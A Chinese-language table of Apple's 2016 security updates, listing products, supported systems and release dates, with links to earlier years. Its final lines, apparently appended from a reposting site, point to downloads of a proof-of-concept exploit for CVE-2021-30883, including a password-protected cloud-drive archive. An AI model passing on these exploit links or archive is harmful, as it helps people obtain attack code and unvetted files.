| macOS Sierra 10.12.2、安全性更新 2016-003 El Capitan 和安全性更新 2016-007 Yosemite | OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12.1 | 2016 年 12 月 13 日 |
| Apple tvOS 10.1 | Apple TV(第 4 代) | 2016 年 12 月 12 日 |
| iOS 10.2 | iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型 | 2016 年 12 月 12 日 |
| Transporter 1.9.2 | iTunes Producer 3.1.1、OS X v10.6 及更高版本(64 位)、Windows 7 及更高版本(32 位)和 Red Hat Enterprise Linux(64 位) | 2016 年 12 月 5 日 |
| iOS 10.1.1 | iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型 | 2016 年 10 月 31 日 |
| Windows 版 iTunes 12.5.2 | Windows 7 及更高版本 | 2016 年 10 月 27 日 |
| Windows 版 iCloud 6.0.1 | Windows 7 及更高版本 | 2016 年 10 月 27 日 |
| Xcode 8.1 | OS X El Capitan v10.11.5 及更高版本 | 2016 年 10 月 27 日 |
| watchOS 3.1 | 所有 Apple Watch 机型 | 2016 年 10 月 24 日 |
| Apple tvOS 10.0.1 | Apple TV(第 4 代) | 2016 年 10 月 24 日 |
| Safari 浏览器 10.0.1 | OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12 | 2016 年 10 月 24 日 |
| macOS Sierra 10.12.1、安全性更新 2016-002 El Capitan 和安全性更新 2016-006 Yosemite | OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12 | 2016 年 10 月 24 日 |
| iOS 10.1 | iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型 | 2016 年 10 月 24 日 |
| iOS 10.0.3 | iPhone 7 和 iPhone 7 Plus | 2016 年 10 月 17 日 |
| iOS 10.0.2 | iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型 | 2016 年 9 月 23 日 |
| Mac 版 Pages 文稿 6.0、Numbers 表格 4.0 和 Keynote 讲演 7.0 | macOS 10.12 及更高版本 | 2016 年 9 月 20 日 |
| Windows 版 iCloud 6.0 | Windows 7 及更高版本 | 2016 年 9 月 20 日 |
| macOS 服务器 5.2 | macOS Sierra 10.12 | 2016 年 9 月 20 日 |
| Safari 浏览器 10 | OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12 | 2016 年 9 月 20 日 |
| macOS Sierra 10.12 | OS X Lion v10.7.5 及更高版本 | 2016 年 9 月 20 日 |
| iOS 版 Pages 文稿 3.0、Numbers 表格 3.0 和 Keynote 讲演 3.0 | iOS 10.0 及更高版本 | 2016 年 9 月 13 日 |
| Windows 版 iTunes 12.5.1 | Windows 7 及更高版本 | 2016 年 9 月 13 日 |
| Apple tvOS 10 | Apple TV(第 4 代) | 2016 年 9 月 13 日 |
| watchOS 3 | 所有 Apple Watch 机型 | 2016 年 9 月 13 日 |
| Xcode 8 | OS X El Capitan v10.11.5 及更高版本 | 2016 年 9 月 13 日 |
| iOS 10.0.1 | iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型 | 2016 年 9 月 13 日 |
| iOS 10 | iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型 | 2016 年 9 月 13 日 |
| 安全性更新 2016-001 El Capitan 和安全性更新 2016-005 Yosemite | OS X Yosemite v10.10.5 和 OS X El Capitan v10.11.6 | 2016 年 9 月 1 日 |
| Safari 浏览器 9.1.3 | OS X Mavericks v10.9.5 和 OS X Yosemite v10.10.5 | 2016 年 9 月 1 日 |
| iOS 9.3.5 | iPhone 4s 及更新机型、iPad 2 及更新机型、iPod touch(第 5 代)及更新机型 | 2016 年 8 月 25 日 |
| iOS 9.3.4 | iPhone 4s 及更新机型、iPad 2 及更新机型、iPod touch(第 5 代)及更新机型 | 2016 年 8 月 4 日 |
| Windows 版 iCloud 5.2.1 | Windows 7 及更高版本 | 2016 年 7 月 18 日 |
| Windows 版 iTunes 12.4.2 | Windows 7 及更高版本 | 2016 年 7 月 18 日 |
| Safari 浏览器 9.1.2 | OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11.6 | 2016 年 7 月 18 日 |
| Apple tvOS 9.2.2 | Apple TV(第 4 代) | 2016 年 7 月 18 日 |
| watchOS 2.2.2 | Apple Watch Sport、Apple Watch、Apple Watch Edition 和 Apple Watch Hermès | 2016 年 7 月 18 日 |
| iOS 9.3.3 | iPhone 4s 及更新机型、iPod touch(第 5 代)及更新机型、iPad 2 及更新机型 | 2016 年 7 月 18 日 |
| OS X El Capitan v10.11.6 和安全性更新 2016-004 | OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11 及更高版本 | 2016 年 7 月 18 日 |
| AirPort 基站固件更新 7.6.7 和 7.7.7 | AirPort Express、AirPort Extreme 和 AirPort 时间返回舱基站 (802.11n);AirPort Extreme 和 AirPort 时间返回舱基站 (802.11ac) | 2016 年 6 月 20 日 |
| iTunes 12.4 | Windows 7 及更高版本 | 2016 年 5 月 16 日 |
| Safari 浏览器 9.1.1 | OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11.5 | 2016 年 5 月 16 日 |
| OS X El Capitan v10.11.5 和安全性更新 2016-003 | OS X El Capitan v10.11 及更高版本 | 2016 年 5 月 16 日 |
| watchOS 2.2.1 | Apple Watch Sport、Apple Watch、Apple Watch Edition 和 Apple Watch Hermès | 2016 年 5 月 16 日 |
| iOS 9.3.2 | iPhone 4s 及更新机型、iPod touch(第 5 代)及更新机型、iPad 2 及更新机型 | 2016 年 5 月 16 日 |
| Apple tvOS 9.2.1 | Apple TV(第 4 代) | 2016 年 5 月 16 日 |
| Xcode 7.3.1 | OS X El Capitan v10.11 及更高版本 | 2016 年 5 月 3 日 |
| iOS 9.3.1 | iPhone 4s 及更新机型、iPod touch(第 5 代)及更新机型、iPad 2 及更新机型 | 2016 年 3 月 31 日 |
| iBooks Author 2.4.1 | OS X Yosemite v10.10 及更高版本 | 2016 年 3 月 29 日 |
| OS X 服务器 5.1 | OS X El Capitan v10.11.4 | 2016 年 3 月 21 日 |
| Safari 浏览器 9.1 | OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11.4 | 2016 年 3 月 21 日 |
| OS X El Capitan v10.11.4 和安全性更新 2016-002 | OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11 至 v10.11.3 | 2016 年 3 月 21 日 |
| Xcode 7.3 | OS X El Capitan v10.11 及更高版本 | 2016 年 3 月 21 日 |
| Apple tvOS 9.2 | Apple TV(第 4 代) | 2016 年 3 月 21 日 |
| watchOS 2.2 | Apple Watch Sport、Apple Watch、Apple Watch Edition 和 Apple Watch Hermès | 2016 年 3 月 21 日 |
| iOS 9.3 | iPhone 4s 及更新机型、iPod touch(第 5 代)及更新机型、iPad 2 及更新机型 | 2016 年 3 月 21 日 |
| Apple Software Update 2.2 | Windows 7 及更高版本 | 2016 年 3 月 9 日 |
| Apple TV 7.2.1 | Apple TV(第 3 代) | 2016 年 2 月 25 日 |
| Apple tvOS 9.1.1 | Apple TV(第 4 代) | 2016 年 1 月 25 日 |
| Safari 浏览器 9.0.3 | OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11.3 | 2016 年 1 月 19 日 |
| OS X El Capitan 10.11.3 和安全性更新 2016-001 | OS X Mavericks v10.9.5、OS X Yosemite v10.10.5、OS X El Capitan v10.11 至 v10.11.2 | 2016 年 1 月 19 日 |
| iOS 9.2.1 | iPhone 4s 及更新机型、iPod touch(第 5 代)及更新机型、iPad 2 及更新机型 | 2016 年 1 月 19 日 |
| QuickTime 7.7.9 | Windows 7 和 Windows Vista | 2016 年 1 月 7 日 |
有关更早的安全性更新的信息,请参阅以下文稿:
- Apple 安全性更新(2015 年)
- Apple 安全性更新(2014 年)
- Apple 安全性更新(2013 年)
- Apple 安全性更新(2011 年、2012 年)
- Apple 安全性更新(2010 年)
- Apple 安全性更新(2008 年 1 月 15 日至 2009 年 12 月 3 日)
- Apple 安全性更新(2005 年 1 月 25 日至 2007 年 12 月 21 日)
- Apple 安全性更新(2003 年 10 月 3 日至 2005 年 1 月 11 日)
- Apple 安全性更新(2003 年 8 月及以前)
cve-2021-30883 POC下载地址
①GitHub
github.com/saaramar/IOMFB_integer_overflow_poc
②云中转网盘:
yunzhongzhuan.com/#sharefile=xxpQYUFA_14015
解压密码: www.ddosi.org
转载请注明出处及链接